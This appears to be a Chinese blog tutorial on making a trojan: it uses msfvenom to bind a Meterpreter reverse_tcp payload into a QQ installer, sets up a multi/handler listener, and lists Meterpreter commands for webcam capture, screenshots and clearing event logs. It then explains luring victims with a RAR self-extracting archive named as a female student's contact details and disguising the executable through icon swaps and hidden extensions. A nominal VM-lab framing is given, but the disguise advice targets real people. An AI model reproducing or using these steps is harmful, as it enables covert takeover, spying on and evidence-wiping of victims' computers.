捆绑木马

这里使用的是Kali linux虚拟机
攻击机ip是192.168.0.108
靶机ip是192.168.177.134

生成木马文件

首先上传一个正常的安装包到kali里面

我这里下了一个QQ

把它上传到了root路径下

然后开始捆绑

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.108 -f exe -x /root/dy/PCQQ2020.exe -o /root/dy/QQ.exe

-p:指定后面的payload

windows/meterpreter/reverse_tcp:申明这是一个windows系统下的一个反弹tcp

LHOST=192.168.0.108,:设置反弹回来的ip,即你的kali的ip地址

还可以设置返回的端口,这里就不设置了,默认返回端口是4444

-f: 代表要捆绑的文件类型,这里是一个exe文件

-x:指定你要捆绑的文件的路径及文件名,这里我选择的是root/dy/里的PCQQ2020.exe

-o:指定生成的木马文件的路径及文件名,这里我把它保存在原路径里,名字就叫QQ.exe
生成完毕

附:msfvenom介绍
msfvenom简介
msfvenom是msfpayload,msfencode的结合体,可利用msfvenom生成木马程序,并在目标机上执行,配合meterpreter在本地监听上线。
msfvenom重要参数:(可以使用msfvenom -h查看所有参数)
-p payload设置
-e 编码设置
-a 系统结构,默认x86
-s payload最大大小
-i 编码次数
-f 生成文件格式

msfvenom生成

生成payload,有有两个必须的选项:-p-f
使用-p来指定要使用的payload。

./msfvenom –l payloads      //查看所有msf可用的payload列表

使用-f来指定payload的输出格式

./msfvenom -p windows/meterpreter/bind_tcp -f exe
./msfvenom --help –formats      //查看msf支持的输出格式
一个典型的msfvenom使用举例如下:

$./msfvenom -p windows/meterpreter/reverse_tcplhost=[Attacker IP]lport=4444 -f  exe -o /tmp/my_payload.exe
exploit/multi/handler模块简介

msf>use exploit/multi/handler
#使用exploit/multi/handler监听连入的backdoor
msf exploit(handler)>set payload windows/meterpreter/reverse_http
#设置对应的payload。
Msf exploit(handler)>show options
#显示所有的设置如果需要的话,可能还需要将LHOST,LPORT,设置成与payload中相同的地址和端口。
设置监听反弹

msfconsole
use multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.0.108
set lport 4444
run

发送木马

接下来将木马文件发送给目标,至于怎么让目标信任你,安装你发过去的文件。就看你的社工能力了。
作为一个遵守中华人民共和国网络安全法的四有青年,我当然是选择把木马文件发送到另一台windows系统的虚拟机里面。

先将木马文件发到物理机上,然后再从物理机上传到虚拟机上

然后双击运行QQ
kali就已经连接到了靶机

附:Meterpreter常用命令

info                    #查看已有模块信息
getuid                  #查看权限
getpid                  #获取当前进程的pid
sysinfo                 #查看目标机系统信息
ps                      #查看当前活跃进程
kill <PID值>            #杀死进程
reboot / shutdown       #重启/关机shell #进入目标机cmd shell 
webcam_list             #查看摄像头
webcam_snap             #通过摄像头拍照
webcam_stream           #通过摄像头开启视频
execute                 #在目标机中执行文件execute -H -i -f 
cmd.exe                 #创建新进程cmd.exe,-H不可见,-i交互
migrate <pid值>         #将Meterpreter会话移植到指定pid值进程中
clearav                 #清除windows中的应用程序日志、系统日志、安全日志
enumdesktops            #查看可用的桌面
getdesktop              #获取当前meterpreter 关联的桌面
set_desktop             #设置meterpreter关联的桌面 -h查看帮助
screenshot              #截屏
use espia               #或者使用espia模块截屏 然后输入screengrab
run vnc                 #使用vnc远程桌面连接
进一步获取权限

shell
目标主机就是你的了

如果对方就是不下载安装你发的文件怎么办?
RAR有一个自解压的功能
我们可以利用这一点来达到目的
有两个文件,一个是刚刚生成的木马文件,一个是一个txt文档
全部选中,右击添加到压缩文件,注意这里一定要用rar压缩方式

常规里面

文件名可以是一个诱惑性的,比如学妹联系方式.txt,这里的txt不是文件类型,是文件名的一部分,它的文件类型还是exe
压缩格式RAR,选择创建自解压格式压缩文件

高级选项中,有个自解压选项

选中它
常规:解压路径随便填一个,这里放在C盘根目录

设置:解压前运行txt文件,解压后运行QQ.exe文件

模式:解压时隐藏所有信息

然后确定,确定,再确定

就会解压出一个名为学妹联系方式的文件

将这个文件发出去

同样设置监听反弹,与第一部分一样

msfconsole
use multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.0.108
set lport 4444
run

当打开这个文档时,显示的是txt文件里的内容,但是QQ.exe也暗中执行了。
当然,实际情况中得换一个轻量级的文件,否则别人看到一个txt文件有80多mb,肯定会怀疑的。

伪装
如何伪装的更像一点呢?
这里以QQ.exe举例

介绍两个工具

BeCyIconGrabber,这个工具可以提取文件图标。
这里提取了一个word文档的图标

Resource Hacker
这个工具能修改文件图标
将它的图标换成word文档的图标

这是更改图标后与更改前的区别

因为需要管理员权限才能执行,所以多了个盾牌的标记。
换成其它的文件就能避免出现此类情况

当然,因为微软默认是隐藏后缀名的,一般情况下非专业人士都不会修改成显示后缀名的。所以一般情况下被攻击者看不到后缀的。如下图:

但是,万一被攻击者显示后缀名了呢?

也有办法伪装
把文件名取得长一点,windows就会只显示一部分内容,将后面部分的文件名隐藏。如下:

msfconsole捆绑木马相关推荐

  1. 转:色情网站背后的秘密 播放器捆绑木马传毒

    5月5日的<焦点访谈>再次揭露了色情网站和木马的秘密,常州警方公布了一起利用色情网站传播盗号木马的案件.案例中,木马传播者以色情视频为诱饵,诱使 网民安装qvod的播放器,在这个播放器中捆 ...

  2. msfvenom shellter——程序捆绑木马_端口映射远程控制

    文章目录 一.工具&环境 二.准备 三.木马与程序捆绑 Ⅰ.msfvenom捆绑 Ⅱ.shellter捆绑 四.msfconsole监听 完 免责声明:本文章仅供网络安全方面学习.交流使用,任 ...

  3. 检测捆绑木马及后门de方法

    直接进入主题,这些方法是我常用的方法.也是我个人的经验,本人技术有限哪里说得不好请大家见谅.(以下为本人纯手工打,有的为借鉴) 1.手动查找软件捆绑 我这里拿cmd.exe和udp.exe做测试来检测 ...

  4. 轻松制作捆绑木马的安装包

    想看她的秘密,所以想在她的电脑上放马.但是又不能明目张胆的放吧!不会高超的编程技术,怎样把我的木马放入安装包里呢? 看我是如何用著名的Winrar压缩软件来制作带木马的捆绑文件 1.选中要创建自解压包 ...

  5. WinRAR捆绑木马

    准备好木马文件 server.exe 准备一个小游戏 趣味数学计算 压缩 创建自解压格式压缩文件 自解压选项设置 解压路径设置 设置程序 模式设置 压缩完成 使用 开始玩游戏

  6. Metasploit 实现木马生成、捆绑及免杀

    简介: 在渗透测试的过程中,避免不了使用到社会工程学的方式来诱骗对方运行我们的木马或者点击我们准备好的恶意链接.木马的捆绑在社会工程学中是我们经常使用的手段,而为了躲避杀毒软件的查杀,我们又不得不对木 ...

  7. 网络安全技术第六章——第三节木马的攻击与防治(中木马现象、木马病毒概念结构、木马实施攻击过程、配置传播运行连接木马、远程控制、木马伪装手段、更换图标改名换姓文件捆绑出错显示网页嫁衣自我销毁邮件附件)

    木马的攻击与防治 木马的攻击防治 1.日常生活现象 2.木马病毒的概念和由来 3.木马病毒的结构 4.木马实施攻击的过程 5.木马的识别与防治方法 总结个人防范技巧: 木马的攻击防治 1.日常生活现象 ...

  8. msfvenom捆绑/制作木马程序

    使用命令: 捆绑木马: msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.56.101 LPORT=443 -x calc.exe - ...

  9. msf工具之木马程序制作以及伪装

    本文转自行云博客https://www.xy586.top 文章目录 捆绑木马 RAR自动解压 捆绑木马 使用msfvenom制作木马程序: #生成木马文件 msfvenom -p windows/m ...

  10. 利用msfvenom制作windows木马及免杀马

    实验环境:kali(10.250.70.251) Windows  x32位(10.250.70.252) 第一步:确保二者之间的网络能够相互ping通 注意:linux可以ping通windows, ...

最新文章

  1. 力扣(LeetCode)刷题,简单题(第25期)
  2. 使用json-server搭建模拟api接口
  3. Oracle 升级10.2.0.5.4 OPatch 报错Patch 12419392 Optional component(s) missing 解决方法
  4. python函数中参数前面的*和**的含义
  5. 看完阿逗比年度炫技大会,我什么都不敢信了
  6. sklearn 相似度矩阵_精简易懂,30 分钟学会 SVD 矩阵分解,很强!
  7. spider-定向抓取
  8. Taro+react开发(32)注意符号
  9. systemctl命令完全指南
  10. Teamcenter开发问题之-- relation 无法创建 and 无法check in
  11. MyEclipse 修改 默认的 工作空间(转)
  12. 软工大二下半年第十五周学习进度
  13. MVC实用架构设计(三)——EF-Code First(4):数据查询
  14. 不能将下载行为传输到IDM插件的解决方法
  15. 获取GeoScene Pro 90天免费试用版
  16. 离散元 python_开源离散元软件YADE的安装与编译(基于ubuntu18.04) | 望天博客
  17. 17.半拗(小拗)可救可不救
  18. 通过LNK文件(快捷方式)解析出目标文件的路径
  19. 数据挖掘实战:二手车交易价格预测
  20. 谈一谈|Word文档图片的提取

热门文章

  1. DockerFile的编写构建镜像步骤,常用命令和案例
  2. Fedora14硬盘安装
  3. 求模板啊,求软著说明书模板啊
  4. 松本行弘的程序世界读书笔记
  5. 防关联超级浏览器(超级防关联浏览器)的应用场景和技术原理
  6. 渗透测试实战分享—从app到网站沦陷
  7. PHP-laravel框架一1
  8. I2C接口触摸屏驱动分析
  9. html添加js的代码注释,JavaScript 注释方法总结
  10. 【icourse163】学习python爬虫的代码整理